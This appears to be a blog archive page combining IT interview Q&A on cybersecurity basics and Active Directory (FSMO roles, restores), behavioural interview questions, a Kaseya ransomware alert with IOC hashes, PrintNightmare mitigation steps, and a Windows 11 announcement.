It is mostly performed to identify, evaluate, and prioritize risks across organizations.

The best way to perform cybersecurity risk assessment is to detect:

•Relevant threats in your organization

•Internal and external vulnerabilities

•Evaluate vulnerabilities impact if they are exploited

Q39) What are the seven layers of the OSI model?

Ans. The main objective of the OSI model is to process the communication between two endpoints ina network.

The seven open systems interconnection layers are listed below:

Application layer (layer 7) - It allows users to communicate with network/application whenever required to perform network-related operations.

Presentation layer (layer 6) - It manages encryption and decryption of data required for the application layer. It translates or formats data for the application layer based on the syntax of the application that accepts.

Session layer (layer 5) - It determines the period of a system that waits for other application to respond.

Transport layer (layer 4) - It is used for sending data across a network and also offers error checking practices and data flow controls.

Network layer (layer 3) - It is used to transfer data to and fro through another network.

Data-link layer (layer 2) - It handles the flow of data to and fro in a network. It also controls problems that occur due to bit transmission errors.

•Physical layer (layer 1) - It transfers the computer bits from one device to another through the network. Italso controls how physical connections are set up to the network and also bits represented into signals while transmitting either optically, electrically, or radio waves

Q40) What are the several indicators of compromise(IOC) that organizations should monitor?

Ans. The key indicators of compromise that organizations should monitor are listed below:

•Unusual Outbound Network Traffic  •HTML Response Sizes

•Geographical Irregularities •Increases in Database Read Volume

•Log-In Red Flags •Unexpected Patching of Systems

•Large Numbers of Requests for the Same File •Web Traffic with Unhuman Behavior

•Suspicious Registry or System File Changes •Unusual DNS Requests

•Mobile Device Profile Changes •Bundles of Data in the Wrong Place

•Mismatched Port-Application Traffic •Signs of DDoS Activity

•Anomalies in Privileged User Account Activity




EXAMPLE BEHAVIOURAL INTERVIEW QUESTIONS

Below is a list of commonly asked behavioural interview questions which highlight specific competencies and behavioural traits in the workplace. 

Initiative

• Tell me about any ideas or processes that you have implemented in your current job.

• Have you ever suggested a new way to improve your team/project’s performance? 

Problem Solving

• Tell me about a complex problem you have solved. Walk me through the process you took.

• Tell me about a potential problem you have prevented from occurring.

Leadership Skills

• How do you go about allocating work for your staff? Can you give me an example?

• Tell me about a time when you have provided coaching to one of your staff.

• Tell me about a time when you have had staff members resist your leadership. What did you do to overcome this?

Decision Making

• Tell me about a recent decision you have made in your role. Walk me through your thought processes.

• What is the most difficult decision you have made in your current role? 

Team Skills

• Tell me about a time when you had to work with a team of people you did not know.

• Tell me about a specific situation where you were able to help out a team member or colleague.

Project Management

• Tell me about a project you have managed recently. Walk me through your planning and tracking process.

• Tell me about a project you managed that didn’t go to plan.

Analysis Skills

• Tell me about a project where you were asked to gather and evaluate complex information.

• Tell me about a time when you were asked to make a recommendation based on statistical information.

Time Management

• Tell me about a specific situation when you managed conflicting priorities. What did you do?

• Tell me about a time when the project you were working on seemed in danger of missing a deadline. What did you do?

Building Rapport

• Tell me about a time when you have had to deal with a difficult customer/colleague. 

What happened? What was difficult about them?

Quick Learner

• Tell me about a time in your current role when you had to learn new skills quickly.

Negotiation Skills

• Tell me about a difficult negotiation that you had to handle.

Kaseya VSA Supply-Chain Ransomware Attack

After #printnightmare Another High Alert for Security Community and administrators. No weekend or holidays for #cybersecurity .

#Kaseya VSA Supply-Chain #Ransomware Attack by ransomware group REvil is exploiting vulnerable instances of Kaseya VSA globally. 

Kaseya VSA is a platform that provides endpoint management and network monitoring. Anyone who is currently using or has a MSP that is running #Kaseya software has potentially been compromised! 

Once inside the supplier’s system, attackers use it as a jumping off point to access its customers’ networks too. Then they install ransomware, which locks up victims’ data, only releasing it once a ransom payment has been made.


It is recommend organisations follow the advice provided by Kaseya, to immediately #shutdown your Kaseya server until further notice. 

So far 200 US company affected and one of Sweden's biggest grocery chains, closed all of its 800 stores today after this attack as they were unable to operate its cash registers.

Technical Details: Kaseya supply chain attack Indicators of Compromise (IOCs)

HASHES (SHA256) d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e e

2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 8

dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd 

More info available here: https://lnkd.in/gJ5hfD2 S

someone rightly said Cybercriminals are awful for a whole bunch of reasons, but especially for ruining long weekends and holidays for IT professionals over and over again. Be nice to your IT team. They're the ones working through the nights and weekends to protect you from these scum. 

 #ThreatHunting #IOC #REvil #KaseyaVSA #KaseyaHacked #KaseyaVSA #MSP

Print Spooler vulnerability PrintNightmare

A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. 

An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. Attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

 Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the #Print #spooler service disabled. Do It now and save yourself from Print spooler vulnerability CVE-2021-34527 #printnightmare

see the flowchart to determine if you required to disable print spooler now


If disabling the Print Spooler service is appropriate for your organisation you can do the following way.

1. The recommended way to do this is using a Group Policy Object via

Computer Configuration > Administrative Templates > Printers >>

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks 

 2. You can also use the following PowerShell commands:

 Stop-Service -Name Spooler -Force 

 Set-Service -Name Spooler -StartupType Disabled

 Good Luck. 

 #windows #printer #printnightmare


Windows 11 is here . all new features and exciting things to come ..

  Windows11 is here. From the official release that details new features for windows11


 
Windows11 is also secure by design, with new built-in security technologies that will add protection from the chip to the cloud, while enabling productivity and new experiences. Windows 11 provides a Zero Trust-ready operating system to protect data and access across devices.

The team have worked closely with OEM and silicon partners to raise security baselines to meet the needs of the evolving threat landscape and the new hybrid work world.

 


Windows 11 unlocks the full potential of your system’s hardware, putting some of the latest #gaming technology to work for you. Like: DirectX 12 Ultimate, which can enable breathtaking, immersive graphics at high frame rates; DirectStorage for faster load times and more detailed game worlds; and Auto HDR for a wider, more vivid range of colors for a truly captivating visual experience.



Also Windows 11 will be bringing #Android apps to Windows for the first time. Starting later this year, people will be able to discover Android apps in the Microsoft Store and download them through the #Amazon Appstore – imagine recording and posting a video or using Khan Academy Kids for virtual learning right from your PC.



Windows 11 will be available through a free upgrade for eligible Windows 10 PCs. To check if your current Windows 10 PC is eligible for the free upgrade to Windows 11, visit Windows.com to download the PC Health Check app


Here is the official release details  Link https://blogs.windows.com/windowsexperience/2021/06/24/introducing-windows-11/


AD Active Directory Interview Questions and Answers

What is Active Directory?

Active Directory (AD) is a directory service developed by Microsoft and used to store objects like User, Computer, printer, Network information, It facilitate to manage your network effectively with multiple Domain Controllers in different location with AD database, able to manage/change AD from any Domain Controllers and this will be replicated to all other DC’s, centralized Administration with multiple geographical location and authenticates users and computers in a Windows domain

What is LDAP and how the LDAP been used on Active Directory(AD)?

What is Tree?
Tree is a hierarchical arrangement of windows Domain that share a contiguous name space

What is Domain?
Active Directory Domain Services is Microsoft’s Directory Server. It provides authentication and authorization mechanisms as well as a framework within which other related services can be deployed

What is Active Directory Domain Controller (DC)?
Domain Controller is the server which holds the AD database, All AD changes get replicated to other DC and vise vase

What is Forest?
Forest consists of multiple Domains trees. The Domain trees in a forest do not form a contiguous name space however share a common schema and global catalog (GC)

What is Schema?
Active directory schema is the set of definitions that define the kinds of object and the type of information about those objects that can be stored in Active Directory
Active directory schema is Collection of object class and there attributes
Object Class = User
Attributes = first name, last name, email, and others

Can we restore a schema partition?


Tel me about the FSMO roles?
Schema Master
Domain Naming Master
Infrastructure Master
RID Master
PDC
Schema Master and Domain Naming Master are forest wide role and only available one on each Forest, Other roles are Domain wide and one for each Domain
AD replication is multi master replication and change can be done in any Domain Controller and will get replicated to others Domain Controllers, except above file roles, this will be flexible single master operations (FSMO), these changes only be done on dedicated Domain Controller so it’s single master replication

How to check which server holds which role?
Netdom query FSMO

Which FSMO role is the most important? And why?
Interesting question which role is most important out of 5 FSMO roles or if one role fails that will impact the end-user immediately
Most armature administrators pick the Schema master role, not sure why maybe they though Schema is very critical to run the Active Directory
Correct answer is PDC, now the next question why? Will explain role by role what happens when a FSMO role holder fails to find the answer

Schema Master – Schema Master needed to update the Schema, we don’t update the schema daily right, when will update the Schema? While the time of operating system migration, installing new Exchange version and any other application which requires extending the schema
So if are Schema Master Server is not available, we can’t able to update the schema and no way this will going to affect the Active Directory operation and the end-user
Schema Master needs to be online and ready to make a schema change, we can plan and have more time to bring back the Schema Master Server

Domain Naming Master – Domain Naming Master required to creating a new Domain and creating an application partition, Like Schema Master we don’t cerate Domain and application partition frequently
So if are Domain Naming Master Server is not available, we can’t able to create a new Domain and application partition, it may not affect the user, user event didn’t aware Domain Naming Master Server is down

Infrastructure Master – Infrastructure Master updates the cross domain updates, what really updates between Domains? Whenever user login to Domain the TGT has been created with the list of access user got through group membership (user group membership details) it also contain the user membership details from trusted domain, Infrastructure Master keep this information up-to-date, it update reference information every 2 days by comparing its data with the Global Catalog (that’s why we don’t keep Infrastructure Master and GC in same server)
In a single Domain and single Forest environment there is no impact if the Infrastructure Master server is down
In a Multi Domain and Forest environment, there will be impact and we have enough time to fix the issue before it affect the end-user

RID Master –Every DC is initially issued 500 RID’s from RID Master Server.  RID’s are used to create a new object on Active Directory, all new objects are created with Security ID (SID) and RID is the last part of a SID. The RID uniquely identifies a security principal relative to the local or domain security authority that issued the SID
When it gets down to 250 (50%) it requests a second pool of RID’s from the RID master.  If RID 

Master Server is not available the RID pools unable to be issued to DC’s and DC’s are only able to create a new object depends on the available RID’s, every DC has anywhere between 250 and 750 RIDs available, so no immediate impact

PDC – PDC required for Time sync, user login, password changes and Trust, now you know why the PDC is important FSMO role holder to get back online, PDC role will impact the end-user immediately and we need to recover ASAP
The PDC emulator Primary Domain Controller for backwards compatibility and it’s responsible for time synchronizing within a domain, also the password master. Any password change is replicated to the PDC emulator ASAP. If a logon request fails due to a bad password the logon request is passed to the PDC emulator to check the password before rejecting the login request.

Tel me about Active Directory Database and list the Active Directory Database files?
NTDS.DIT
EDB.Log
EDB.Che
Res1.log and Res2.log
All AD changes didn’t write directly to NTDS.DIT database file, first write to EDB.Log and from log file to database, EDB.Che used to track the database update from log file, to know what changes are copied to database file.
NTDS.DIT: NTDS.DIT is the AD database and store all AD objects, Default location is the %system root%\nrds\nrds.dit, Active Directory database engine is the extensible storage engine which us based on the Jet database
EDB.Log: EDB.Log is the transaction log file when EDB.Log is full, it is renamed to EDB Num.log where num is the increasing number starting from 1, like EDB1.Log
EDB.Che: EDB.Che is the checkpoint file used to trace the data not yet written to database file this indicate the starting point from which data is to be recovered from the log file in case if failure
Res1.log and Res2.log:  Res is reserved transaction log file which provide the transaction log file enough time to shutdown if the disk didn’t have enough space

Active Directory restores types?
Authoritative restore
Non-authoritative restore

Non-authoritative restore of Active Directory
Non-authoritative restore is restore the domain controller to its state at the time of backup, and allows normal replication to overwrite restored domain controller with any changes that have occurred after the backup. After system state restore, domain controller queries its replication partners and get the changes after backup date, to ensure that the domain controller has an accurate and updated copy of the Active Directory database.
Non-authoritative restore is the default method for restoring Active Directory, just a restore of system state is non-authoritative restore and mostly we use this for Active Directory data loss or corruption.

How perform a non-authoritative restore?
Just start the domain controller in Directory Services Restore Mode and perform system state restore from backup

Authoritative restore of Active Directory
An authoritative restore is next step of the non-authoritative restore process. We have do non-authoritative restore before you can perform an authoritative restore. The main difference is that an authoritative restore has the ability to increment the version number of the attributes of all objects or an individual object in an entire directory, this will make it authoritative restore an object in the directory. This can be used to restore a single deleted user/group and event an entire OU.
In a non-authoritative restore, after a domain controller is back online, it will contact its replication partners to determine any changes since the time of the last backup. However the version number of the object attributes that you want to be authoritative will be higher than the existing version numbers of the attribute, the object on the restored domain controller will appear to be more recent and therefore, restored object will be replicated to other domain controllers in the Domain

How perform a authoritative restore?
Unlike a non-authoritative restore, an authoritative restores need to Ntdsutil.exe to increment the version number of the object attributes

What are Active Directory Partitions can be restored?
You can authoritatively restore only objects from configuration and domain partition. Authoritative restores of schema-naming contexts are not supported.

How many domain controllers need to back up? Or which domain controllers to back up?
Minimum requirement is to back up two domain controllers in each domain, one should be an operations master role holder DC, no need to backup RID Master (relative ID) because RID master should not be restored

Twitter Facebook Favorites More